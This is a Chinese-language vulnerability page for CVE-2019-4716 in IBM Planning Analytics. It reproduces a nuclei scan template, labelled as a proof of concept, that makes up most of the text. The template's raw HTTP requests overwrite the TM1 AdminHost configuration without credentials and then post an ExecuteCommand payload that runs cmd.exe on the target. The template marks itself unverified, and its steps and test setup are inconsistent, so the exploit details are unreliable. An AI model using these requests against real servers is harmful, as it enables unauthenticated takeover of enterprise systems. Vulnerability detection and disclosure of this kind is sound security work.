IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

漏洞信息

漏洞名称： IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2019-4716

漏洞类型： 权限绕过

漏洞等级： 严重

漏洞描述： IBM Planning Analytics是一款由IBM开发的企业级规划和分析软件，广泛应用于财务规划、预算编制和预测分析等领域。该软件支持通过TM1脚本进行数据操作和分析，是企业决策支持系统的重要组成部分。在版本2.0.0至2.0.8中，存在一个严重的配置覆盖漏洞，允许攻击者无需有效凭证即可绕过认证机制，以管理员身份登录并执行任意代码。该漏洞的根源在于未经认证的访问权限配置不当，使得攻击者能够覆盖系统配置，进而利用TM1脚本执行权限提升和远程代码执行。这一漏洞的利用可能导致攻击者完全控制系统，执行任意命令，访问敏感数据，甚至破坏系统服务。由于攻击无需认证，且可以自动化执行，因此对使用受影响版本的企业构成了极高的安全风险。

产品厂商： IBM

产品名称： IBM Planning Analytics

影响版本： 2.0.0 <= version <= 2.0.8

来源： https://github.com/projectdiscovery/nuclei-templates/blob/6a7e8750d20a675a40656a8d9a4ba5d0ab2c6424/http%2Fcves%2F2019%2FCVE-2019-4716.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2019-4716

info:
  name: IBM Planning Analytics 2.0.0-2.0.8 - Authentication Bypass & Remote Code Execution
  author: pranjal
  severity: critical
  description: |
    IBM Planning Analytics versions 2.0.0 through 2.0.8 contain a configuration overwrite caused by unauthenticated access,
    letting attackers login as 'admin' and execute code as root or SYSTEM via TM1 scripting. The vulnerability allows
    authentication bypass and remote code execution without valid credentials.
  impact: |
    An attacker can exploit this vulnerability to gain administrative access and execute arbitrary code with elevated privileges.
  remediation: |
    Upgrade IBM Planning Analytics to version 2.0.9 or later to fix the authentication bypass and remote code execution vulnerability.
  reference:
    - https://packetstormsecurity.com/files/156953/IBM-Cognos-TM1-IBM-Planning-Analytics-Server-Configuration-Overwrite-Code-Execution.html
    - https://seclists.org/fulldisclosure/2020/Mar/44
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-4716
    cwe-id: CWE-287
    epss-score: 0.98765
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:ibm:planning_analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: ibm
    product: planning_analytics
    verified: false
    # Debug Information for Validation
    debug-info: |
      To validate this template:
      1. Set up IBM Planning Analytics 2.0.8 (vulnerable version)
      2. Run: nuclei -t CVE-2019-4716.yaml -u http://target:port -debug
      3. Expected debug output should show:
         - Step 1: Configuration endpoint accessible (200 OK)
         - Step 2: Configuration overwrite successful (200/201)
         - Step 3: RCE command execution successful with randstr in response
      4. Alternative: Use TM1 REST API detection method
    test-environment: |
      Docker setup for testing:
      - IBM Planning Analytics 2.0.8 container
      - Expose port 9510 (default TM1 port)
      - Enable TM1 REST API
      - Disable authentication for testing
  tags: cve,cve2019,ibm,planning-analytics,tm1,rce,auth-bypass,packetstorm

flow: http(1) && http(2) && http(3)

http:
  # Step 1: Check if IBM Planning Analytics/TM1 is running
  - raw:
      - |
        GET /tm1/api/v1/Configuration HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "adminhost") || contains(tolower(body), "adminport") || contains(tolower(body), "configuration")'
        condition: and
        internal: true

  # Step 2: Authentication bypass via configuration overwrite
  - raw:
      - |
        POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "AdminHost": "{{randstr}}",
          "AdminPort": 1234
        }

    matchers:
      - type: status
        status:
          - 200
          - 201
        internal: true

  # Step 3: RCE via TM1 scripting - Execute command to verify admin access
  - raw:
      - |
        POST /tm1/api/v1/ExecuteCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "Command": "ExecuteProcess('cmd.exe', '/c echo {{randstr}}')"
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 201

      - type: regex
        regex:
          - "success|executed|completed|{{randstr}}"
        part: body

  # Alternative detection method for TM1 REST API endpoints
  - raw:
      - |
        GET /tm1/api/v1/Processes HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "processes|tm1|planning"
        part: body

      - type: word
        words:
          - "IBM"
          - "Planning"
          - "Analytics"
        part: body
        condition: or